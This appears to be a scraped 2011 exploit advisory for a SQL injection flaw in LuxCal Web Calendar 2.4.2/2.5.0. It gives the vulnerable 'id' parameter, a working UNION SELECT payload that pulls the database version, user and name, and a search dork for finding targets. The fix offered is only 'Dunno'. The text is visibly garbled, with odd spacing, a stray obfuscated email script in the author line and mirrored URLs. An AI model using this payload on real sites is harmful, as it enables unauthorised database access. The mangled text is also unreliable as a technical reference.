######################################## ######################################## ##
# LuxCal Web Calendar v2.4.2/v2.5.0 SQL Injection Vulnerability ##
# Author: kaMtiEz (kamtiez@exploit-id.com <script type = "text/javascript">
/* <! [CDATA [*/
(Function () {try {var s, a, I, j, r, c, l = document. getElementById ("_ cf_email _"); a = l. className; if (a) {s =; r = parseInt (. substr (0, 2), 16); for (j = 2;. length-j; j + = 2) {c = parseInt (. substr (j, 2), 16) ^ r; s + = String. fromCharCode (c);} s = document. createTextNode (s); l. parentNode. replaceChild (s, l) ;}} catch (e ){}})();
/*]> */
</Script> )##
# Homepage: http://www.indonesiancoder.com/http://exploit-id.com/http://magelangcyber.web.id ##
# Date: 6 July, 2011 ##
######################################## ######################################## ######
[Software Information]
[+] Vendor: http://www.luxsoft.eu
[+] Download: http://www.luxsoft.eu/index.php? Pge = dload
[+] Version: 2.4.2-2.5.0 or lower maybe also affected
[+] Vulnerability: SQL INJECTION
[+] Dork: "CiHuY"
[+] LOCATION: INDONESIA-JOGJA
######################################## ######################################
[Vulnerable File]
Http://www.bkjia.com/?kamtiez=/index.php? XP = 11 & id = [num]
[XpL]
Http://www.bkjia.com/?kamtiez=/index.php? XP = 11 & id = [num]
[Test]
Http://www.bkjia.com/luxcal/index.php? XP = 11 & id =-326415 + union + all + select + 1, 2, @ version, user (), 5, database (), 7, 8, 9, 10, 11, 12, 13, 14, 15,16, 17,18, 19,20, 22, 24, 27 --
[Repair]
Dunno: "> filter page Input
######################################## ####################
[Thx TO]
[+] INDONESIANCODER-EXPLOIT-ID-magelangcyber team-malangcyber crew-KILL-9
[+] Tukulesto, arianom, el-farhatz, Jundab, Ibl13Z, Ulow, s1do3L, Boebefa, Hmei7, RyanAby, Albert twired, GonzHack, zw.t
[+] Lagripe-Dz, KedAns-Dz, By_aGreSiF, t0r3x, Mboys, Contrex, Gh4mb4S, jos_ali_joe, keys, n4sss, r3m1ck, k4mpr3t0
[+] Yur4kh4, xr0b0t, kido, trycyber, n4ck0, Caddy-Dz dan teman2 semuanya yang saya tak bisa sebutkan satu2: D
[NOTE]
[+] Stop Dreaming, Lets Do it!
[+] Jangan Takut, Luka Pasti Akan Sembuh :)
[QUOTE]
[+] INDONESIANCODER still r0x
[+] Nothing secure ..